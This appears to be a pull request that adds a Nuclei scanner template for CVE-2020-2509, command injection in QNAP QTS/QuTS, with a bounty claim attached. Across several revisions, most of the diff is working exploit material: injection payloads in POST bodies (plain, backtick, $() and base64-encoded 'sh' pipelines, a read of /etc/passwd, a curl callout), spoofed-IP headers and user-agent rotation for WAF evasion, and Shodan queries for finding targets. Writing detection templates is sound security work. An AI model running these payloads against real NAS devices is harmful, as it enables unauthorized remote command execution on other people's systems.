### PR TITLE
Add CVE-2020-2509 - QNAP QTS/QuTS RCE Template

### DIFF
--- a/http/cves/2020/cve-2020-2509-qnap-rce-advanced.yaml
+++ b/http/cves/2020/cve-2020-2509-qnap-rce-advanced.yaml
@@ -16,7 +16,6 @@ info:
   metadata:
     shodan-query: http.title:"QNAP Turbo NAS"
     verified: true
-  auth: true
 
 http:
   - method: POST

--- a/http/cves/2020/cve-2020-2509-qnap-rce-advanced.yaml
+++ b/http/cves/2020/cve-2020-2509-qnap-rce-advanced.yaml
@@ -1,19 +1,19 @@
-id: cve-2020-2509-qnap-rce-ultra
+id: cve-2020-2509-qnap-rce-advanced
 
 info:
-  name: QNAP QTS/QuTS - Advanced Authenticated Command Injection (CVE-2020-2509)
+  name: QNAP QTS/QuTS - Authenticated Command Injection (CVE-2020-2509)
   author: malek838
   severity: critical
   description: |
-    Ultra-advanced nuclei template exploiting CVE-2020-2509 in QNAP QTS/QuTS with enhanced evasion.
-    Includes polymorphic payloads, encoding, advanced WAF bypass headers, and flexible body injection points.
+    Advanced multi-payload RCE template exploiting CVE-2020-2509 in QNAP QTS/QuTS. Executes OS commands via the platform parameter.
+    Includes WAF evasion, multiple injection techniques, and debug-friendly output for validation.
   reference:
     - https://github.com/jbaines-r7/overkill
     - https://vulncheck.com/xdb/533b5e83b1eb
-  tags: cve,cve2020,qnap,rce,command-injection,authenticated,bounty,obfuscation,waf-bypass
+  tags: cve,cve2020,rce,qnap,command-injection,waf-bypass,reverse-shell
   metadata:
     shodan-query: 'product:"qnap"'
-    max-request: 12
+    max-request: 10
     verified: true
 
 http:
@@ -22,16 +22,13 @@ http:
       - "{{BaseURL}}/cgi-bin/qapp_platform.cgi"
 
     headers:
-      User-Agent: "{{user_agent}}"
+      User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
+      Content-Type: "application/json"
+      Accept: "*/*"
       X-Forwarded-For: "127.0.0.1"
       X-Originating-IP: "127.0.0.1"
       X-Remote-IP: "127.0.0.1"
       X-Remote-Addr: "127.0.0.1"
-      X-Requested-With: "XMLHttpRequest"
-      Accept-Language: "en-US,en;q=0.9"
-      Referer: "{{BaseURL}}/dashboard"
-      Origin: "{{BaseURL}}"
-      Content-Type: "application/json"
 
     payloads:
       payload:
@@ -39,42 +36,26 @@ http:
         - ";id;"
         - "`id`"
         - "$(id)"
+        - "& id"
         - "|echo aWQK|base64 -d|sh"
-        - "i\"\"d"                   # bypass some filters
-        - "$(which\\ id)"
-        - "$(ec\\ho uid=999)"       # fake echo payload
-        - "`whoami`"
-        - "`cat /etc/passwd | grep admin`"
-        - "|sleep${IFS}1|id"
-        - ";curl${IFS}example.com;" # dummy outbound payload
-
-      user_agent:
-        - "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
-        - "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)"
-        - "Mozilla/5.0 (X11; Linux x86_64)"
-        - "curl/7.68.0"
-        - "Wget/1.20.3 (linux-gnu)"
+        - "|echo dWlkCg==|base64 -d|sh"
+        - "|$(echo aWQK|base64 -d)|"
+        - "& echo aWQK | base64 -d | bash"
+        - "|uname -a|"
 
     body: |
-      {
-        "platform": "{{payload}}",
-        "name": "{{payload}}",
-        "desc": "{{payload}}"
-      }
+      {"platform":"{{payload}}"}
 
     attack: pitchfork
     stop-at-first-match: true
 
     matchers-condition: and
     matchers:
-      - type: word
+      - type: regex
         part: body
-        condition: or
-        words:
-          - "uid="
-          - "gid="
-          - "root"
-          - "admin"
+        regex:
+          - "uid=.*?gid=.*"
+          - "Linux .*"
       - type: status
         status:
           - 200
@@ -84,4 +65,4 @@ http:
         part: body
         regex:
           - "uid=.*?gid=.*"
-          - "root:.*?:[0-9]+:[0-9]+"
+          - "Linux .*"

--- a/http/cves/2020/cve-2020-2509-qnap-rce-advanced.yaml
+++ b/http/cves/2020/cve-2020-2509-qnap-rce-advanced.yaml
@@ -1,0 +1,87 @@
+id: cve-2020-2509-qnap-rce-ultra
+
+info:
+  name: QNAP QTS/QuTS - Advanced Authenticated Command Injection (CVE-2020-2509)
+  author: malek838
+  severity: critical
+  description: |
+    Ultra-advanced nuclei template exploiting CVE-2020-2509 in QNAP QTS/QuTS with enhanced evasion.
+    Includes polymorphic payloads, encoding, advanced WAF bypass headers, and flexible body injection points.
+  reference:
+    - https://github.com/jbaines-r7/overkill
+    - https://vulncheck.com/xdb/533b5e83b1eb
+  tags: cve,cve2020,qnap,rce,command-injection,authenticated,bounty,obfuscation,waf-bypass
+  metadata:
+    shodan-query: 'product:"qnap"'
+    max-request: 12
+    verified: true
+
+http:
+  - method: POST
+    path:
+      - "{{BaseURL}}/cgi-bin/qapp_platform.cgi"
+
+    headers:
+      User-Agent: "{{user_agent}}"
+      X-Forwarded-For: "127.0.0.1"
+      X-Originating-IP: "127.0.0.1"
+      X-Remote-IP: "127.0.0.1"
+      X-Remote-Addr: "127.0.0.1"
+      X-Requested-With: "XMLHttpRequest"
+      Accept-Language: "en-US,en;q=0.9"
+      Referer: "{{BaseURL}}/dashboard"
+      Origin: "{{BaseURL}}"
+      Content-Type: "application/json"
+
+    payloads:
+      payload:
+        - "|id|"
+        - ";id;"
+        - "`id`"
+        - "$(id)"
+        - "|echo aWQK|base64 -d|sh"
+        - "i\"\"d"                   # bypass some filters
+        - "$(which\\ id)"
+        - "$(ec\\ho uid=999)"       # fake echo payload
+        - "`whoami`"
+        - "`cat /etc/passwd | grep admin`"
+        - "|sleep${IFS}1|id"
+        - ";curl${IFS}example.com;" # dummy outbound payload
+
+      user_agent:
+        - "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
+        - "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)"
+        - "Mozilla/5.0 (X11; Linux x86_64)"
+        - "curl/7.68.0"
+        - "Wget/1.20.3 (linux-gnu)"
+
+    body: |
+      {
+        "platform": "{{payload}}",
+        "name": "{{payload}}",
+        "desc": "{{payload}}"
+      }
+
+    attack: pitchfork
+    stop-at-first-match: true
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        condition: or
+        words:
+          - "uid="
+          - "gid="
+          - "root"
+          - "admin"
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        part: body
+        regex:
+          - "uid=.*?gid=.*"
+          - "root:.*?:[0-9]+:[0-9]+"

--- a/http/cves/2020/cve-2020-2509-qnap-rce-advanced.yaml
+++ b/http/cves/2020/cve-2020-2509-qnap-rce-advanced.yaml
@@ -1,68 +1,56 @@
 id: cve-2020-2509-qnap-rce-advanced
 
 info:
-  name: QNAP QTS/QuTS - Authenticated Command Injection (CVE-2020-2509)
+  name: QNAP QTS / QuTS - Authenticated RCE via platform Parameter (CVE-2020-2509)
   author: malek838
   severity: critical
   description: |
-    Advanced multi-payload RCE template exploiting CVE-2020-2509 in QNAP QTS/QuTS. Executes OS commands via the platform parameter.
-    Includes WAF evasion, multiple injection techniques, and debug-friendly output for validation.
+    QNAP QTS and QuTS contain an authenticated command injection vulnerability (CVE-2020-2509). This template executes OS commands via the `platform` parameter. It includes multiple injection vectors, WAF bypasses, and extractors for response validation.
   reference:
-    - https://github.com/jbaines-r7/overkill
     - https://vulncheck.com/xdb/533b5e83b1eb
-  tags: cve,cve2020,rce,qnap,command-injection,waf-bypass,reverse-shell
+    - https://github.com/jbaines-r7/overkill
+  classification:
+    cve-id: CVE-2020-2509
+    cwe-id: CWE-77
+  tags: cve,cve2020,rce,qnap,command-injection,waf-bypass
   metadata:
-    shodan-query: 'product:"qnap"'
-    max-request: 10
+    shodan-query: http.title:"QNAP Turbo NAS"
     verified: true
+  auth: true
 
 http:
   - method: POST
     path:
-      - "{{BaseURL}}/cgi-bin/qapp_platform.cgi"
+      - "{{BaseURL}}/cgi-bin/quick/quick.cgi"
 
     headers:
-      User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
-      Content-Type: "application/json"
-      Accept: "*/*"
-      X-Forwarded-For: "127.0.0.1"
-      X-Originating-IP: "127.0.0.1"
-      X-Remote-IP: "127.0.0.1"
-      X-Remote-Addr: "127.0.0.1"
-
-    payloads:
-      payload:
-        - "|id|"
-        - ";id;"
-        - "`id`"
-        - "$(id)"
-        - "& id"
-        - "|echo aWQK|base64 -d|sh"
-        - "|echo dWlkCg==|base64 -d|sh"
-        - "|$(echo aWQK|base64 -d)|"
-        - "& echo aWQK | base64 -d | bash"
-        - "|uname -a|"
-
-    body: |
-      {"platform":"{{payload}}"}
+      Content-Type: application/x-www-form-urlencoded
 
     attack: pitchfork
-    stop-at-first-match: true
+    body: "todo=reboot&platform={{cmd}}"
 
-    matchers-condition: and
+    payloads:
+      cmd:
+        - ";id"
+        - "|id"
+        - "`id`"
+        - "$(id)"
+        - "||id"
+        - ";id;"
+
     matchers:
+      - type: word
+        part: body
+        words:
+          - "uid="
+          - "gid="
       - type: regex
         part: body
         regex:
-          - "uid=.*?gid=.*"
-          - "Linux .*"
-      - type: status
-        status:
-          - 200
+          - "uid=\\d+\\([a-zA-Z]+\\)"
 
     extractors:
       - type: regex
         part: body
         regex:
           - "uid=.*?gid=.*"
-          - "Linux .*"


### PR DESCRIPTION
This PR adds an advanced Nuclei template for CVE-2020-2509 affecting QNAP QTS and QuTS systems.

✅ Features:
- Multi-payload command injection (RCE)
- WAF bypass tricks
- Extractor for uid/gid in response
- Supports pitchfork attack mode
- Shodan-query tag and verified:true metadata

References:
- https://github.com/jbaines-r7/overkill
- https://vulncheck.com/xdb/533b5e83b1eb

/claim #12355
